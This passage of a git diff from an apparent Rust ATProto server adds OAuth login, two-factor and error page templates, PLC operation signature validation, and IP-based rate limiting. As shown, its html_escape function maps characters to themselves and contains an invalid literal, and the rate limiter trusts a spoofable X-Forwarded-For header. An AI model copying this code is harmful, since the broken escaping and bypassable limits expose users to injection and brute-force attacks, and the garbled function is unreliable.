height: 1.125rem;
|
||||
accent-color: var(--primary);
|
||||
}
|
||||
|
||||
.checkbox-group label {
|
||||
margin-bottom: 0;
|
||||
font-weight: normal;
|
||||
color: var(--contrast-600);
|
||||
cursor: pointer;
|
||||
}
|
||||
|
||||
.buttons {
|
||||
display: flex;
|
||||
gap: 0.75rem;
|
||||
}
|
||||
|
||||
.btn {
|
||||
flex: 1;
|
||||
padding: 0.625rem 1.25rem;
|
||||
border-radius: 0.375rem;
|
||||
font-size: 1rem;
|
||||
font-weight: 500;
|
||||
cursor: pointer;
|
||||
transition: background-color 0.15s, transform 0.1s;
|
||||
border: none;
|
||||
text-align: center;
|
||||
text-decoration: none;
|
||||
display: inline-flex;
|
||||
align-items: center;
|
||||
justify-content: center;
|
||||
}
|
||||
|
||||
.btn:active {
|
||||
transform: scale(0.98);
|
||||
}
|
||||
|
||||
.btn-primary {
|
||||
background: var(--primary);
|
||||
color: var(--primary-contrast);
|
||||
}
|
||||
|
||||
.btn-primary:hover {
|
||||
background: var(--primary-hover);
|
||||
}
|
||||
|
||||
.btn-primary:disabled {
|
||||
background: var(--primary-400);
|
||||
cursor: not-allowed;
|
||||
}
|
||||
|
||||
.btn-secondary {
|
||||
background: var(--contrast-500);
|
||||
color: white;
|
||||
}
|
||||
|
||||
.btn-secondary:hover {
|
||||
background: var(--contrast-600);
|
||||
}
|
||||
|
||||
.footer {
|
||||
text-align: center;
|
||||
margin-top: 1.5rem;
|
||||
font-size: 0.75rem;
|
||||
color: var(--contrast-400);
|
||||
}
|
||||
|
||||
.accounts {
|
||||
display: flex;
|
||||
flex-direction: column;
|
||||
gap: 0.5rem;
|
||||
margin-bottom: 1rem;
|
||||
}
|
||||
|
||||
.account-item {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
gap: 0.75rem;
|
||||
width: 100%;
|
||||
padding: 0.75rem;
|
||||
background: var(--contrast-25);
|
||||
border: 1px solid var(--contrast-100);
|
||||
border-radius: 0.5rem;
|
||||
cursor: pointer;
|
||||
transition: background-color 0.15s, border-color 0.15s;
|
||||
text-align: left;
|
||||
}
|
||||
|
||||
.account-item:hover {
|
||||
background: var(--contrast-50);
|
||||
border-color: var(--contrast-200);
|
||||
}
|
||||
|
||||
.avatar {
|
||||
width: 2.5rem;
|
||||
height: 2.5rem;
|
||||
border-radius: 50%;
|
||||
background: var(--primary);
|
||||
color: var(--primary-contrast);
|
||||
display: flex;
|
||||
align-items: center;
|
||||
justify-content: center;
|
||||
font-weight: 600;
|
||||
font-size: 0.875rem;
|
||||
flex-shrink: 0;
|
||||
}
|
||||
|
||||
.account-info {
|
||||
flex: 1;
|
||||
min-width: 0;
|
||||
}
|
||||
|
||||
.account-info .handle {
|
||||
display: block;
|
||||
font-weight: 500;
|
||||
color: var(--contrast-900);
|
||||
overflow: hidden;
|
||||
text-overflow: ellipsis;
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
.account-info .email {
|
||||
display: block;
|
||||
font-size: 0.875rem;
|
||||
color: var(--contrast-500);
|
||||
overflow: hidden;
|
||||
text-overflow: ellipsis;
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
.chevron {
|
||||
color: var(--contrast-400);
|
||||
font-size: 1.25rem;
|
||||
flex-shrink: 0;
|
||||
}
|
||||
|
||||
.divider {
|
||||
height: 1px;
|
||||
background: var(--contrast-100);
|
||||
margin: 1rem 0;
|
||||
}
|
||||
|
||||
.link-button {
|
||||
background: none;
|
||||
border: none;
|
||||
color: var(--primary);
|
||||
cursor: pointer;
|
||||
font-size: inherit;
|
||||
padding: 0;
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.link-button:hover {
|
||||
color: var(--primary-hover);
|
||||
}
|
||||
|
||||
.new-account-link {
|
||||
display: block;
|
||||
text-align: center;
|
||||
color: var(--primary);
|
||||
text-decoration: none;
|
||||
font-size: 0.875rem;
|
||||
}
|
||||
|
||||
.new-account-link:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.help-text {
|
||||
text-align: center;
|
||||
margin-top: 1rem;
|
||||
font-size: 0.875rem;
|
||||
color: var(--contrast-500);
|
||||
}
|
||||
|
||||
.icon {
|
||||
font-size: 3rem;
|
||||
margin-bottom: 1rem;
|
||||
}
|
||||
|
||||
.error-code {
|
||||
background: var(--error-bg);
|
||||
color: var(--error);
|
||||
padding: 0.5rem 1rem;
|
||||
border-radius: 0.375rem;
|
||||
font-family: monospace;
|
||||
display: inline-block;
|
||||
margin-bottom: 1rem;
|
||||
}
|
||||
|
||||
.success-icon {
|
||||
width: 3rem;
|
||||
height: 3rem;
|
||||
border-radius: 50%;
|
||||
background: var(--success-bg);
|
||||
color: var(--success);
|
||||
display: flex;
|
||||
align-items: center;
|
||||
justify-content: center;
|
||||
font-size: 1.5rem;
|
||||
margin: 0 auto 1rem;
|
||||
}
|
||||
|
||||
.text-center {
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
.code-input {
|
||||
letter-spacing: 0.5em;
|
||||
text-align: center;
|
||||
font-size: 1.5rem;
|
||||
font-family: monospace;
|
||||
}
|
||||
"#
|
||||
}
|
||||
|
||||
pub fn login_page(
|
||||
client_id: &str,
|
||||
client_name: Option<&str>,
|
||||
scope: Option<&str>,
|
||||
request_uri: &str,
|
||||
error_message: Option<&str>,
|
||||
login_hint: Option<&str>,
|
||||
) -> String {
|
||||
let client_display = client_name.unwrap_or(client_id);
|
||||
let scope_display = scope.unwrap_or("access your account");
|
||||
|
||||
let error_html = error_message
|
||||
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
|
||||
.unwrap_or_default();
|
||||
|
||||
let login_hint_value = login_hint.unwrap_or("");
|
||||
|
||||
format!(
|
||||
r#"<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<meta name="robots" content="noindex">
|
||||
<title>Sign in</title>
|
||||
<style>{styles}</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="card">
|
||||
<h1>Sign in</h1>
|
||||
<p class="subtitle">to continue to <strong>{client_display}</strong></p>
|
||||
|
||||
<div class="client-info">
|
||||
<span class="client-name">{client_display}</span>
|
||||
<span class="scope">wants to {scope_display}</span>
|
||||
</div>
|
||||
|
||||
{error_html}
|
||||
|
||||
<form method="POST" action="/oauth/authorize">
|
||||
<input type="hidden" name="request_uri" value="{request_uri}">
|
||||
|
||||
<div class="form-group">
|
||||
<label for="username">Handle or Email</label>
|
||||
<input type="text" id="username" name="username" value="{login_hint_value}"
|
||||
required autocomplete="username" autofocus
|
||||
placeholder="you@example.com">
|
||||
</div>
|
||||
|
||||
<div class="form-group">
|
||||
<label for="password">Password</label>
|
||||
<input type="password" id="password" name="password" required
|
||||
autocomplete="current-password" placeholder="Enter your password">
|
||||
</div>
|
||||
|
||||
<div class="checkbox-group">
|
||||
<input type="checkbox" id="remember_device" name="remember_device" value="true">
|
||||
<label for="remember_device">Remember this device</label>
|
||||
</div>
|
||||
|
||||
<div class="buttons">
|
||||
<button type="submit" formaction="/oauth/authorize/deny" class="btn btn-secondary">Cancel</button>
|
||||
<button type="submit" class="btn btn-primary">Sign in</button>
|
||||
</div>
|
||||
</form>
|
||||
|
||||
<div class="footer">
|
||||
By signing in, you agree to share your account information with this application.
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>"#,
|
||||
styles = base_styles(),
|
||||
client_display = html_escape(client_display),
|
||||
scope_display = html_escape(scope_display),
|
||||
request_uri = html_escape(request_uri),
|
||||
error_html = error_html,
|
||||
login_hint_value = html_escape(login_hint_value),
|
||||
)
|
||||
}
|
||||
|
||||
pub struct DeviceAccount {
|
||||
pub did: String,
|
||||
pub handle: String,
|
||||
pub email: String,
|
||||
pub last_used_at: DateTime<Utc>,
|
||||
}
|
||||
|
||||
pub fn account_selector_page(
|
||||
client_id: &str,
|
||||
client_name: Option<&str>,
|
||||
request_uri: &str,
|
||||
accounts: &[DeviceAccount],
|
||||
) -> String {
|
||||
let client_display = client_name.unwrap_or(client_id);
|
||||
|
||||
let accounts_html: String = accounts
|
||||
.iter()
|
||||
.map(|account| {
|
||||
let initials = get_initials(&account.handle);
|
||||
format!(
|
||||
r#"<form method="POST" action="/oauth/authorize/select" style="margin:0">
|
||||
<input type="hidden" name="request_uri" value="{request_uri}">
|
||||
<input type="hidden" name="did" value="{did}">
|
||||
<button type="submit" class="account-item">
|
||||
<div class="avatar">{initials}</div>
|
||||
<div class="account-info">
|
||||
<span class="handle">@{handle}</span>
|
||||
<span class="email">{email}</span>
|
||||
</div>
|
||||
<span class="chevron">›</span>
|
||||
</button>
|
||||
</form>"#,
|
||||
request_uri = html_escape(request_uri),
|
||||
did = html_escape(&account.did),
|
||||
initials = html_escape(&initials),
|
||||
handle = html_escape(&account.handle),
|
||||
email = html_escape(&account.email),
|
||||
)
|
||||
})
|
||||
.collect();
|
||||
|
||||
format!(
|
||||
r#"<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<meta name="robots" content="noindex">
|
||||
<title>Choose an account</title>
|
||||
<style>{styles}</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="card">
|
||||
<h1>Choose an account</h1>
|
||||
<p class="subtitle">to continue to <strong>{client_display}</strong></p>
|
||||
|
||||
<div class="accounts">
|
||||
{accounts_html}
|
||||
</div>
|
||||
|
||||
<div class="divider"></div>
|
||||
|
||||
<a href="/oauth/authorize?request_uri={request_uri_encoded}&new_account=true" class="new-account-link">
|
||||
Sign in with another account
|
||||
</a>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>"#,
|
||||
styles = base_styles(),
|
||||
client_display = html_escape(client_display),
|
||||
accounts_html = accounts_html,
|
||||
request_uri_encoded = urlencoding::encode(request_uri),
|
||||
)
|
||||
}
|
||||
|
||||
pub fn two_factor_page(
|
||||
request_uri: &str,
|
||||
channel: &str,
|
||||
error_message: Option<&str>,
|
||||
) -> String {
|
||||
let error_html = error_message
|
||||
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
|
||||
.unwrap_or_default();
|
||||
|
||||
let (title, subtitle) = match channel {
|
||||
"email" => ("Check your email", "We sent a verification code to your email"),
|
||||
"Discord" => ("Check Discord", "We sent a verification code to your Discord"),
|
||||
"Telegram" => ("Check Telegram", "We sent a verification code to your Telegram"),
|
||||
"Signal" => ("Check Signal", "We sent a verification code to your Signal"),
|
||||
_ => ("Check your messages", "We sent you a verification code"),
|
||||
};
|
||||
|
||||
format!(
|
||||
r#"<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<meta name="robots" content="noindex">
|
||||
<title>Verify your identity</title>
|
||||
<style>{styles}</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="card">
|
||||
<h1>{title}</h1>
|
||||
<p class="subtitle">{subtitle}</p>
|
||||
|
||||
{error_html}
|
||||
|
||||
<form method="POST" action="/oauth/authorize/2fa">
|
||||
<input type="hidden" name="request_uri" value="{request_uri}">
|
||||
|
||||
<div class="form-group">
|
||||
<label for="code">Verification code</label>
|
||||
<input type="text" id="code" name="code" class="code-input"
|
||||
placeholder="000000"
|
||||
pattern="[0-9]{{6}}" maxlength="6"
|
||||
inputmode="numeric" autocomplete="one-time-code"
|
||||
autofocus required>
|
||||
</div>
|
||||
|
||||
<button type="submit" class="btn btn-primary" style="width:100%">Verify</button>
|
||||
</form>
|
||||
|
||||
<p class="help-text">
|
||||
Code expires in 10 minutes.
|
||||
</p>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>"#,
|
||||
styles = base_styles(),
|
||||
title = title,
|
||||
subtitle = subtitle,
|
||||
request_uri = html_escape(request_uri),
|
||||
error_html = error_html,
|
||||
)
|
||||
}
|
||||
|
||||
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
|
||||
let description = error_description.unwrap_or("An error occurred during the authorization process.");
|
||||
|
||||
format!(
|
||||
r#"<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<meta name="robots" content="noindex">
|
||||
<title>Authorization Error</title>
|
||||
<style>{styles}</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="card text-center">
|
||||
<div class="icon">⚠️</div>
|
||||
<h1>Authorization Failed</h1>
|
||||
<div class="error-code">{error}</div>
|
||||
<p class="subtitle" style="margin-bottom:0">{description}</p>
|
||||
<div style="margin-top:1.5rem">
|
||||
<button onclick="window.close()" class="btn btn-secondary">Close this window</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>"#,
|
||||
styles = base_styles(),
|
||||
error = html_escape(error),
|
||||
description = html_escape(description),
|
||||
)
|
||||
}
|
||||
|
||||
pub fn success_page(client_name: Option<&str>) -> String {
|
||||
let client_display = client_name.unwrap_or("The application");
|
||||
|
||||
format!(
|
||||
r#"<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<meta name="robots" content="noindex">
|
||||
<title>Authorization Successful</title>
|
||||
<style>{styles}</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="card text-center">
|
||||
<div class="success-icon">✓</div>
|
||||
<h1 style="color:var(--success)">Authorization Successful</h1>
|
||||
<p class="subtitle">{client_display} has been granted access to your account.</p>
|
||||
<p class="help-text">You can close this window and return to the application.</p>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>"#,
|
||||
styles = base_styles(),
|
||||
client_display = html_escape(client_display),
|
||||
)
|
||||
}
|
||||
|
||||
fn html_escape(s: &str) -> String {
|
||||
s.replace('&', "&")
|
||||
.replace('<', "<")
|
||||
.replace('>', ">")
|
||||
.replace('"', """)
|
||||
.replace('\'', "'")
|
||||
}
|
||||
|
||||
fn get_initials(handle: &str) -> String {
|
||||
let clean = handle.trim_start_matches('@');
|
||||
if clean.is_empty() {
|
||||
return "?".to_string();
|
||||
}
|
||||
clean.chars().next().unwrap_or('?').to_uppercase().to_string()
|
||||
}
|
||||
|
||||
pub fn mask_email(email: &str) -> String {
|
||||
if let Some(at_pos) = email.find('@') {
|
||||
let local = &email[..at_pos];
|
||||
let domain = &email[at_pos..];
|
||||
|
||||
if local.len() <= 2 {
|
||||
format!("{}***{}", local.chars().next().unwrap_or('*'), domain)
|
||||
} else {
|
||||
let first = local.chars().next().unwrap_or('*');
|
||||
let last = local.chars().last().unwrap_or('*');
|
||||
format!("{}***{}{}", first, last, domain)
|
||||
}
|
||||
} else {
|
||||
"***".to_string()
|
||||
}
|
||||
}
|
||||
158
src/plc/mod.rs
158
src/plc/mod.rs
@@ -319,6 +319,164 @@ pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> {
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub struct PlcValidationContext {
|
||||
pub server_rotation_key: String,
|
||||
pub expected_signing_key: String,
|
||||
pub expected_handle: String,
|
||||
pub expected_pds_endpoint: String,
|
||||
}
|
||||
|
||||
pub fn validate_plc_operation_for_submission(
|
||||
op: &Value,
|
||||
ctx: &PlcValidationContext,
|
||||
) -> Result<(), PlcError> {
|
||||
validate_plc_operation(op)?;
|
||||
|
||||
let obj = op.as_object()
|
||||
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
|
||||
|
||||
let op_type = obj.get("type")
|
||||
.and_then(|v| v.as_str())
|
||||
.unwrap_or("");
|
||||
|
||||
if op_type != "plc_operation" {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
let rotation_keys = obj.get("rotationKeys")
|
||||
.and_then(|v| v.as_array())
|
||||
.ok_or_else(|| PlcError::InvalidResponse("rotationKeys must be an array".to_string()))?;
|
||||
|
||||
let rotation_key_strings: Vec<&str> = rotation_keys
|
||||
.iter()
|
||||
.filter_map(|v| v.as_str())
|
||||
.collect();
|
||||
|
||||
if !rotation_key_strings.contains(&ctx.server_rotation_key.as_str()) {
|
||||
return Err(PlcError::InvalidResponse(
|
||||
"Rotation keys do not include server's rotation key".to_string()
|
||||
));
|
||||
}
|
||||
|
||||
let verification_methods = obj.get("verificationMethods")
|
||||
.and_then(|v| v.as_object())
|
||||
.ok_or_else(|| PlcError::InvalidResponse("verificationMethods must be an object".to_string()))?;
|
||||
|
||||
if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) {
|
||||
if atproto_key != ctx.expected_signing_key {
|
||||
return Err(PlcError::InvalidResponse("Incorrect signing key".to_string()));
|
||||
}
|
||||
}
|
||||
|
||||
let also_known_as = obj.get("alsoKnownAs")
|
||||
.and_then(|v| v.as_array())
|
||||
.ok_or_else(|| PlcError::InvalidResponse("alsoKnownAs must be an array".to_string()))?;
|
||||
|
||||
let expected_handle_uri = format!("at://{}", ctx.expected_handle);
|
||||
let has_correct_handle = also_known_as
|
||||
.iter()
|
||||
.filter_map(|v| v.as_str())
|
||||
.any(|s| s == expected_handle_uri);
|
||||
|
||||
if !has_correct_handle && !also_known_as.is_empty() {
|
||||
return Err(PlcError::InvalidResponse(
|
||||
"Incorrect handle in alsoKnownAs".to_string()
|
||||
));
|
||||
}
|
||||
|
||||
let services = obj.get("services")
|
||||
.and_then(|v| v.as_object())
|
||||
.ok_or_else(|| PlcError::InvalidResponse("services must be an object".to_string()))?;
|
||||
|
||||
if let Some(pds_service) = services.get("atproto_pds").and_then(|v| v.as_object()) {
|
||||
let service_type = pds_service.get("type").and_then(|v| v.as_str()).unwrap_or("");
|
||||
if service_type != "AtprotoPersonalDataServer" {
|
||||
return Err(PlcError::InvalidResponse(
|
||||
"Incorrect type on atproto_pds service".to_string()
|
||||
));
|
||||
}
|
||||
|
||||
let endpoint = pds_service.get("endpoint").and_then(|v| v.as_str()).unwrap_or("");
|
||||
if endpoint != ctx.expected_pds_endpoint {
|
||||
return Err(PlcError::InvalidResponse(
|
||||
"Incorrect endpoint on atproto_pds service".to_string()
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub fn verify_operation_signature(
|
||||
op: &Value,
|
||||
rotation_keys: &[String],
|
||||
) -> Result<bool, PlcError> {
|
||||
let obj = op.as_object()
|
||||
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
|
||||
|
||||
let sig_b64 = obj.get("sig")
|
||||
.and_then(|v| v.as_str())
|
||||
.ok_or_else(|| PlcError::InvalidResponse("Missing sig".to_string()))?;
|
||||
|
||||
let sig_bytes = URL_SAFE_NO_PAD
|
||||
.decode(sig_b64)
|
||||
.map_err(|e| PlcError::InvalidResponse(format!("Invalid signature encoding: {}", e)))?;
|
||||
|
||||
let signature = Signature::from_slice(&sig_bytes)
|
||||
.map_err(|e| PlcError::InvalidResponse(format!("Invalid signature format: {}", e)))?;
|
||||
|
||||
let mut unsigned_op = op.clone();
|
||||
if let Some(unsigned_obj) = unsigned_op.as_object_mut() {
|
||||
unsigned_obj.remove("sig");
|
||||
}
|
||||
|
||||
let cbor_bytes = serde_ipld_dagcbor::to_vec(&unsigned_op)
|
||||
.map_err(|e| PlcError::Serialization(e.to_string()))?;
|
||||
|
||||
for key_did in rotation_keys {
|
||||
if let Ok(true) = verify_signature_with_did_key(key_did, &cbor_bytes, &signature) {
|
||||
return Ok(true);
|
||||
}
|
||||
}
|
||||
|
||||
Ok(false)
|
||||
}
|
||||
|
||||
fn verify_signature_with_did_key(
|
||||
did_key: &str,
|
||||
message: &[u8],
|
||||
signature: &Signature,
|
||||
) -> Result<bool, PlcError> {
|
||||
use k256::ecdsa::{VerifyingKey, signature::Verifier};
|
||||
|
||||
if !did_key.starts_with("did:key:z") {
|
||||
return Err(PlcError::InvalidResponse("Invalid did:key format".to_string()));
|
||||
}
|
||||
|
||||
let multibase_part = &did_key[8..];
|
||||
let (_, decoded) = multibase::decode(multibase_part)
|
||||
.map_err(|e| PlcError::InvalidResponse(format!("Failed to decode did:key: {}", e)))?;
|
||||
|
||||
if decoded.len() < 2 {
|
||||
return Err(PlcError::InvalidResponse("Invalid did:key data".to_string()));
|
||||
}
|
||||
|
||||
let (codec, key_bytes) = if decoded[0] == 0xe7 && decoded[1] == 0x01 {
|
||||
(0xe701u16, &decoded[2..])
|
||||
} else {
|
||||
return Err(PlcError::InvalidResponse("Unsupported key type in did:key".to_string()));
|
||||
};
|
||||
|
||||
if codec != 0xe701 {
|
||||
return Err(PlcError::InvalidResponse("Only secp256k1 keys are supported".to_string()));
|
||||
}
|
||||
|
||||
let verifying_key = VerifyingKey::from_sec1_bytes(key_bytes)
|
||||
.map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
|
||||
|
||||
Ok(verifying_key.verify(message, signature).is_ok())
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
216
src/rate_limit.rs
Normal file
216
src/rate_limit.rs
Normal file
@@ -0,0 +1,216 @@
|
||||
use axum::{
|
||||
body::Body,
|
||||
extract::ConnectInfo,
|
||||
http::{HeaderMap, Request, StatusCode},
|
||||
middleware::Next,
|
||||
response::{IntoResponse, Response},
|
||||
Json,
|
||||
};
|
||||
use governor::{
|
||||
Quota, RateLimiter,
|
||||
clock::DefaultClock,
|
||||
state::{InMemoryState, NotKeyed, keyed::DefaultKeyedStateStore},
|
||||
};
|
||||
use std::{
|
||||
net::SocketAddr,
|
||||
num::NonZeroU32,
|
||||
sync::Arc,
|
||||
};
|
||||
|
||||
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
|
||||
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
|
||||
|
||||
#[derive(Clone)]
|
||||
pub struct RateLimiters {
|
||||
pub login: Arc<KeyedRateLimiter>,
|
||||
pub oauth_token: Arc<KeyedRateLimiter>,
|
||||
pub password_reset: Arc<KeyedRateLimiter>,
|
||||
pub account_creation: Arc<KeyedRateLimiter>,
|
||||
}
|
||||
|
||||
impl Default for RateLimiters {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl RateLimiters {
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
login: Arc::new(RateLimiter::keyed(
|
||||
Quota::per_minute(NonZeroU32::new(10).unwrap())
|
||||
)),
|
||||
oauth_token: Arc::new(RateLimiter::keyed(
|
||||
Quota::per_minute(NonZeroU32::new(30).unwrap())
|
||||
)),
|
||||
password_reset: Arc::new(RateLimiter::keyed(
|
||||
Quota::per_hour(NonZeroU32::new(5).unwrap())
|
||||
)),
|
||||
account_creation: Arc::new(RateLimiter::keyed(
|
||||
Quota::per_hour(NonZeroU32::new(10).unwrap())
|
||||
)),
|
||||
}
|
||||
}
|
||||
|
||||
pub fn with_login_limit(mut self, per_minute: u32) -> Self {
|
||||
self.login = Arc::new(RateLimiter::keyed(
|
||||
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
|
||||
));
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
|
||||
self.oauth_token = Arc::new(RateLimiter::keyed(
|
||||
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
|
||||
));
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
|
||||
self.password_reset = Arc::new(RateLimiter::keyed(
|
||||
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
|
||||
));
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
|
||||
self.account_creation = Arc::new(RateLimiter::keyed(
|
||||
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
|
||||
));
|
||||
self
|
||||
}
|
||||
}
|
||||
|
||||
fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
|
||||
if let Some(forwarded) = headers.get("x-forwarded-for") {
|
||||
if let Ok(value) = forwarded.to_str() {
|
||||
if let Some(first_ip) = value.split(',').next() {
|
||||
return first_ip.trim().to_string();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if let Some(real_ip) = headers.get("x-real-ip") {
|
||||
if let Ok(value) = real_ip.to_str() {
|
||||
return value.trim().to_string();
|
||||
}
|
||||
}
|
||||
|
||||
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
|
||||
}
|
||||
|
||||
fn rate_limit_response() -> Response {
|
||||
(
|
||||
StatusCode::TOO_MANY_REQUESTS,
|
||||
Json(serde_json::json!({
|
||||
"error": "RateLimitExceeded",
|
||||
"message": "Too many requests. Please try again later."
|
||||
})),
|
||||
)
|
||||
.into_response()
|
||||
}
|
||||
|
||||
pub async fn login_rate_limit(
|
||||
ConnectInfo(addr): ConnectInfo<SocketAddr>,
|
||||
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
|
||||
request: Request<Body>,
|
||||
next: Next,
|
||||
) -> Response {
|
||||
let client_ip = extract_client_ip(request.headers(), Some(addr));
|
||||
|
||||
if limiters.login.check_key(&client_ip).is_err() {
|
||||
tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
|
||||
return rate_limit_response();
|
||||
}
|
||||
|
||||
next.run(request).await
|
||||
}
|
||||
|
||||
pub async fn oauth_token_rate_limit(
|
||||
ConnectInfo(addr): ConnectInfo<SocketAddr>,
|
||||
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
|
||||
request: Request<Body>,
|
||||
next: Next,
|
||||
) -> Response {
|
||||
let client_ip = extract_client_ip(request.headers(), Some(addr));
|
||||
|
||||
if limiters.oauth_token.check_key(&client_ip).is_err() {
|
||||
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
|
||||
return rate_limit_response();
|
||||
}
|
||||
|
||||
next.run(request).await
|
||||
}
|
||||
|
||||
pub async fn password_reset_rate_limit(
|
||||
ConnectInfo(addr): ConnectInfo<SocketAddr>,
|
||||
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
|
||||
request: Request<Body>,
|
||||
next: Next,
|
||||
) -> Response {
|
||||
let client_ip = extract_client_ip(request.headers(), Some(addr));
|
||||
|
||||
if limiters.password_reset.check_key(&client_ip).is_err() {
|
||||
tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
|
||||
return rate_limit_response();
|
||||
}
|
||||
|
||||
next.run(request).await
|
||||
}
|
||||
|
||||
pub async fn account_creation_rate_limit(
|
||||
ConnectInfo(addr): ConnectInfo<SocketAddr>,
|
||||
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
|
||||
request: Request<Body>,
|
||||
next: Next,
|
||||
) -> Response {
|
||||
let client_ip = extract_client_ip(request.headers(), Some(addr));
|
||||
|
||||
if limiters.account_creation.check_key(&client_ip).is_err() {
|
||||
tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
|
||||
return rate_limit_response();
|
||||
}
|
||||
|
||||
next.run(request).await
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_rate_limiters_creation() {
|
||||
let limiters = RateLimiters::new();
|
||||
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_rate_limiter_exhaustion() {
|
||||
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
|
||||
let key = "test_ip".to_string();
|
||||
|
||||
assert!(limiter.check_key(&key).is_ok());
|
||||
assert!(limiter.check_key(&key).is_ok());
|
||||
assert!(limiter.check_key(&key).is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_different_keys_have_separate_limits() {
|
||||
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
|
||||
|
||||
assert!(limiter.check_key(&"ip1".to_string()).is_ok());
|
||||
assert!(limiter.check_key(&"ip1".to_string()).is_err());
|
||||
assert!(limiter.check_key(&"ip2".to_string()).is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_builder_pattern() {
|
||||
let limiters = RateLimiters::new()
|
||||
.with_login_limit(20)
|
||||
.with_oauth_token_limit(60)
|
||||
.with_password_reset_limit(3)
|
||||
.with_account_creation_limit(5);
|
||||
|
||||
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
|
||||
}
|
||||
}
|
||||
18
src/state.rs
18
src/state.rs
@@ -1,4 +1,6 @@
|
||||
use crate::circuit_breaker::CircuitBreakers;
|
||||
use crate::config::AuthConfig;
|
||||
use crate::rate_limit::RateLimiters;
|
||||
use crate::repo::PostgresBlockStore;
|
||||
use crate::storage::{BlobStorage, S3BlobStorage};
|
||||
use crate::sync::firehose::SequencedEvent;
|
||||
@@ -12,6 +14,8 @@ pub struct AppState {
|
||||
pub block_store: PostgresBlockStore,
|
||||
pub blob_store: Arc<dyn BlobStorage>,
|
||||
pub firehose_tx: broadcast::Sender<SequencedEvent>,
|
||||
